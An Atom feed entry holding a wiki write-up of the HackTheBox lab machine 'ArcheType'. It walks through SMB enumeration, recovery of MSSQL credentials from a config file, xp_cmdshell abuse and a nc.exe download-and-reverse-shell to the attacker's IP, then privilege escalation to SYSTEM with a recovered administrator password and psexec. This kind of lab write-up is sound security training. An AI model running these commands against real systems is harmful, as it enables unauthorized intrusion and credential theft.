<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://book.ghanim.no/index.php?action=history&amp;feed=atom&amp;title=Write-ups%2FHTB%2FArcheType</id>
	<title>Write-ups/HTB/ArcheType - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://book.ghanim.no/index.php?action=history&amp;feed=atom&amp;title=Write-ups%2FHTB%2FArcheType"/>
	<link rel="alternate" type="text/html" href="https://book.ghanim.no/index.php?title=Write-ups/HTB/ArcheType&amp;action=history"/>
	<updated>2026-04-21T14:47:16Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://book.ghanim.no/index.php?title=Write-ups/HTB/ArcheType&amp;diff=1141&amp;oldid=prev</id>
		<title>imported&gt;Aghanim at 07:41, 17 June 2021</title>
		<link rel="alternate" type="text/html" href="https://book.ghanim.no/index.php?title=Write-ups/HTB/ArcheType&amp;diff=1141&amp;oldid=prev"/>
		<updated>2021-06-17T07:41:41Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;{{Infobox WriteUp&lt;br /&gt;
| name = ArcheType&lt;br /&gt;
| platform = HackTheBox&lt;br /&gt;
| os = Windows&lt;br /&gt;
| difficulty = Easy&lt;br /&gt;
| techniques = SMB, MSSQL&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
[[File:2021-06-maxresdefault-1.jpg|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Enumeration ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In the enumeration stage I start off by doing an NMAP scan.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
sudo nmap -sV -A -p- --script vuln 10.10.10.27 -oN nmap.result&lt;br /&gt;
--------------------------------------------------------------&lt;br /&gt;
Nmap scan report for 10.10.10.27&lt;br /&gt;
Host is up (0.062s latency).&lt;br /&gt;
Not shown: 65523 closed ports&lt;br /&gt;
PORT      STATE SERVICE      VERSION&lt;br /&gt;
135/tcp   open  msrpc        Microsoft Windows RPC&lt;br /&gt;
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn&lt;br /&gt;
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds&lt;br /&gt;
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000&lt;br /&gt;
|_sslv2-drown:&lt;br /&gt;
| vulners:&lt;br /&gt;
|   cpe:/a:microsoft:sql_server:2017:&lt;br /&gt;
|     	CVE-2007-5090	7.5	https://vulners.com/cve/CVE-2007-5090&lt;br /&gt;
|     	CVE-2021-1636	6.5	https://vulners.com/cve/CVE-2021-1636&lt;br /&gt;
|     	CVE-2019-1068	6.5	https://vulners.com/cve/CVE-2019-1068&lt;br /&gt;
|_    	CVE-2019-0819	4.0	https://vulners.com/cve/CVE-2019-0819&lt;br /&gt;
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)&lt;br /&gt;
|_http-csrf: Couldn&amp;#039;t find any CSRF vulnerabilities.&lt;br /&gt;
|_http-dombased-xss: Couldn&amp;#039;t find any DOM based XSS.&lt;br /&gt;
|_http-server-header: Microsoft-HTTPAPI/2.0&lt;br /&gt;
|_http-stored-xss: Couldn&amp;#039;t find any stored XSS vulnerabilities.&lt;br /&gt;
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)&lt;br /&gt;
|_http-csrf: Couldn&amp;#039;t find any CSRF vulnerabilities.&lt;br /&gt;
|_http-dombased-xss: Couldn&amp;#039;t find any DOM based XSS.&lt;br /&gt;
|_http-server-header: Microsoft-HTTPAPI/2.0&lt;br /&gt;
|_http-stored-xss: Couldn&amp;#039;t find any stored XSS vulnerabilities.&lt;br /&gt;
49664/tcp open  msrpc        Microsoft Windows RPC&lt;br /&gt;
49665/tcp open  msrpc        Microsoft Windows RPC&lt;br /&gt;
49666/tcp open  msrpc        Microsoft Windows RPC&lt;br /&gt;
49667/tcp open  msrpc        Microsoft Windows RPC&lt;br /&gt;
49668/tcp open  msrpc        Microsoft Windows RPC&lt;br /&gt;
49669/tcp open  msrpc        Microsoft Windows RPC&lt;br /&gt;
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows&lt;br /&gt;
&lt;br /&gt;
Host script results:&lt;br /&gt;
| smb-vuln-ms08-067:&lt;br /&gt;
|   VULNERABLE:&lt;br /&gt;
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)&lt;br /&gt;
|     State: LIKELY VULNERABLE&lt;br /&gt;
|     IDs:  CVE:CVE-2008-4250&lt;br /&gt;
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,&lt;br /&gt;
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary&lt;br /&gt;
|           code via a crafted RPC request that triggers the overflow during path canonicalization.&lt;br /&gt;
|&lt;br /&gt;
|     Disclosure date: 2008-10-23&lt;br /&gt;
|     References:&lt;br /&gt;
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250&lt;br /&gt;
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx&lt;br /&gt;
|_smb-vuln-ms10-054: false&lt;br /&gt;
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
There are a couple of interesting ports open, among other things port 445 (SMB) and 1433 (mssql).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I&amp;#039;ll run &amp;#039;enum4linux&amp;#039; against the server. The interesting take from that scan was that it dosent require username or password to connect to SMB.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
enum4linux -H 10.10.10.27&lt;br /&gt;
-----------------------------&lt;br /&gt;
 ====================================&lt;br /&gt;
|    Session Check on 10.10.10.27    |&lt;br /&gt;
 ====================================&lt;br /&gt;
[+] Server 10.10.10.27 allows sessions using username &amp;#039;&amp;#039;, password &amp;#039;&amp;#039;&lt;br /&gt;
[+] Got domain/workgroup name:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We&amp;#039;ll try and connect to SMB using &amp;#039;smbclient&amp;#039;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
smbclient -L //10.10.10.27&lt;br /&gt;
--------------------------&lt;br /&gt;
Sharename       Type      Comment&lt;br /&gt;
	---------       ----      -------&lt;br /&gt;
	ADMIN$          Disk      Remote Admin&lt;br /&gt;
	backups         Disk&lt;br /&gt;
	C$              Disk      Default share&lt;br /&gt;
	IPC$            IPC       Remote IPC&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
------------------------------&lt;br /&gt;
# Connect to backups&lt;br /&gt;
smbclient //10.10.10.27/backups&lt;br /&gt;
smb: \&amp;gt; ls&lt;br /&gt;
  .                                   D        0  Mon Jan 20 12:20:57 2020&lt;br /&gt;
  ..                                  D        0  Mon Jan 20 12:20:57 2020&lt;br /&gt;
  prod.dtsConfig                     AR      609  Mon Jan 20 12:23:02 2020&lt;br /&gt;
&lt;br /&gt;
		10328063 blocks of size 4096. 8248445 blocks available&lt;br /&gt;
smb: \&amp;gt; get prod.dtsConfig&lt;br /&gt;
&lt;br /&gt;
-----------------------&lt;br /&gt;
cat prod.dtsConfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
        Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Gain access ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I found a username and a password. I will use those creds to try and connect to mssql. Using [https://github.com/SecureAuthCorp/impacket impackts]&amp;#039;mssqlclient.py&amp;#039; to connect  to mssql.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth&lt;br /&gt;
Impacket v0.9.24.dev1 - Copyright 2021 SecureAuth Corporation&lt;br /&gt;
&lt;br /&gt;
Password:&lt;br /&gt;
&lt;br /&gt;
SQL&amp;gt; help&lt;br /&gt;
&lt;br /&gt;
     lcd {path}                 - changes the current local directory to {path}&lt;br /&gt;
     exit                       - terminates the server process (and this session)&lt;br /&gt;
     enable_xp_cmdshell         - you know what it means&lt;br /&gt;
     disable_xp_cmdshell        - you know what it means&lt;br /&gt;
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell&lt;br /&gt;
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)&lt;br /&gt;
     ! {cmd}                    - executes a local shell cmd&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
From the help menu I can see that I can execute arbitrary commands on the SQL server. I&amp;#039;ll use [https://github.com/int0x33/nc.exe?files=1 int0x33]&amp;#039;s &amp;#039;nc.exe&amp;#039;, send this to the target machine, and try and get a reverse shell.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Terminal 1 attacker - in the same dir as nc.exe&lt;br /&gt;
sudo python3 -m http.server 8080&lt;br /&gt;
&lt;br /&gt;
# Terminal 2 target SQL&lt;br /&gt;
SQL&amp;gt; enable_xp_cmdshell&lt;br /&gt;
SQL&amp;gt; reconfigure&lt;br /&gt;
SQL&amp;gt; xp_cmdshell &amp;quot;powershell wget http://10.10.14.117:8080/nc.exe -OutFile %temp%/nc.exe&amp;quot;&lt;br /&gt;
output&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
NULL&lt;br /&gt;
&lt;br /&gt;
# Terminal 1 attacker - nc.exe is sent from attacker to target&lt;br /&gt;
10.10.10.27 - - [17/Jun/2021 07:59:41] &amp;quot;GET /nc.exe HTTP/1.1&amp;quot; 200 -&lt;br /&gt;
&lt;br /&gt;
# Terminal 3 attacker&lt;br /&gt;
sudo rlwrap nc -nlvp 443&lt;br /&gt;
listening on [any] 443 ...&lt;br /&gt;
&lt;br /&gt;
# Terminal 2 target SQL&lt;br /&gt;
SQL&amp;gt; xp_cmdshell &amp;quot;%temp%/nc.exe -nv 10.10.14.117 443 -e cmd.exe&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# Target 3 attacker - reverse shell&lt;br /&gt;
connect to [10.10.14.117] from (UNKNOWN) [10.10.10.27] 49716&lt;br /&gt;
Microsoft Windows [Version 10.0.17763.107]&lt;br /&gt;
(c) 2018 Microsoft Corporation. All rights reserved.&lt;br /&gt;
&lt;br /&gt;
C:\Windows\system32&amp;gt;whoami&lt;br /&gt;
archetype\sql_svc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;&amp;#039;&amp;#039;rlwrap &amp;#039;&amp;#039;&amp;#039;gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell&amp;#039;&amp;#039;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== PrivSec ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Using [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASbat carlospolop&amp;#039;s]winPEAS.bat we can find possible privsec vectors. Its an amazing tool that you should have in your toolbox. Its available for Linux aswell.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We&amp;#039;ll send the &amp;#039;winPEAS.bat&amp;#039; to the target using http.server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
SQL&amp;gt; xp_cmdshell &amp;quot;powershell wget http://10.10.14.117:8080/winPEASbat -OutFile %temp%/winpeas.bat&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# From the reverse shell&lt;br /&gt;
C:\Users\sql_svc&amp;gt; cd %temp%&lt;br /&gt;
C:\Users\sql_svc\AppData\Local\Temp&amp;gt;winpeas.bat&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This will run the winpeas.bat, and it takes a while to run. From the winpeas.bat we find an interesting file &amp;#039;C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine&amp;#039;. From the file we find the password for &amp;#039;administrator&amp;#039; , which is &amp;#039;MEGACORP_4dm1n!!&amp;#039;. Using that info, we can use impackts psexec.py to login to administrator and get the root flag.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
psexec.py administrator@10.10.10.27&lt;br /&gt;
Impacket v0.9.24.dev1 - Copyright 2021 SecureAuth Corporation&lt;br /&gt;
&lt;br /&gt;
Password:&lt;br /&gt;
[*] Requesting shares on 10.10.10.27.....&lt;br /&gt;
[*] Found writable share ADMIN$&lt;br /&gt;
[*] Uploading file FfeDRNaS.exe&lt;br /&gt;
[*] Opening SVCManager on 10.10.10.27.....&lt;br /&gt;
[*] Creating service qkmG on 10.10.10.27.....&lt;br /&gt;
[*] Starting service qkmG.....&lt;br /&gt;
[!] Press help for extra shell commands&lt;br /&gt;
Microsoft Windows [Version 10.0.17763.107]&lt;br /&gt;
(c) 2018 Microsoft Corporation. All rights reserved.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
C:\Windows\system32&amp;gt;whoami&lt;br /&gt;
nt authority\system&lt;br /&gt;
&lt;br /&gt;
C:\Users\Administrator&amp;gt;cd Desktop&lt;br /&gt;
&lt;br /&gt;
C:\Users\Administrator&amp;gt;dir&lt;br /&gt;
 Directory of C:\Users\Administrator\Desktop&lt;br /&gt;
&lt;br /&gt;
01/20/2020  06:42 AM              .&lt;br /&gt;
01/20/2020  06:42 AM              ..&lt;br /&gt;
02/25/2020  07:36 AM                32 root.txt&lt;br /&gt;
               1 File(s)             32 bytes&lt;br /&gt;
               2 Dir(s)  33,822,023,680 bytes free&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:HackTheBox]]&lt;br /&gt;
[[Category:Windows]]&lt;br /&gt;
[[Category:Write-ups]]&lt;/div&gt;</summary>
		<author><name>imported&gt;Aghanim</name></author>
	</entry>
</feed>